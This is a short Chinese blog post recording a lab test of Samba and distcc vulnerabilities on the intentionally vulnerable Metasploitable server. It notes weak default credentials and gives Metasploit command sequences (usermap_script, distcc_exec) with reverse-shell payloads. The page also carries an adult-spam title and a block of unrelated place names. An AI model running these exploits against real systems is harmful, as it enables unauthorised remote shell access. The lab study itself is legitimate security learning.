中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Samba&distcc 漏洞

發布時間:2020-05-27 16:57:09 來源:網絡 閱讀:1040 作者:GeForever 欄目:安全技術

漏洞測試確實是可以的  當時把文章copy下來進行再進行測試。但是沒有copy到圖片,實驗是成功了,但是沒有那么直觀。

使用metasploit

對metasploitable 靶服務器進行***

metasploitable 是ubuntu8.0的版本

 

neuss掃描到漏洞

139端口可以獲取該系統主機名為“METASPLOITABLE”,注釋“metasploitable server (Samba 3.0.20-Debian)”;

系統存在弱口令,用戶user、msfadmin密碼與用戶名一樣,使用net use命令能夠建立連接查看共享資源。ftp開放版本信息 ProFTPD 1.3.1 Server (Debian),user這個用戶在ftp中也可以使用;

telnet服務開放,可確定該系統為Ubuntu 8.04,用戶user、msfadmin可以登錄,并獲得相應權限。如果不存在弱口令,通過截獲該telnet數據也能獲取用戶口令

一個distcc漏洞

一個samba 共享服務漏洞

 

 

msf對靶服務器的工具

smb-samba 共享服務

 

use exploit/multi/samba/usermap_script

set payload cmd/unix/reverse

set rhost (ip address)

set lhost (ip address)

exploit

 

use exploit/unix/misc/distcc_exec

set payload cmd/unix/reverse_perl

set rhost  (ip address)

set lhost  (ip address)

exploit

 

distcc 成功 但是沒有root的權限

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

屯门区| 滦平县| 睢宁县| 穆棱市| 海城市| 安西县| 周宁县| 林芝县| 望奎县| 宜都市| 黄陵县| 呼伦贝尔市| 伊通| 大石桥市| 额敏县| 淮安市| 山东省| 长沙县| 射洪县| 贵港市| 化州市| 新野县| 宁德市| 磐安县| 陵水| 合阳县| 马关县| 璧山县| 永登县| 固安县| 鹤庆县| 临邑县| 花莲县| 防城港市| 二连浩特市| 承德县| 怀化市| 绥德县| 葫芦岛市| 米泉市| 资讯|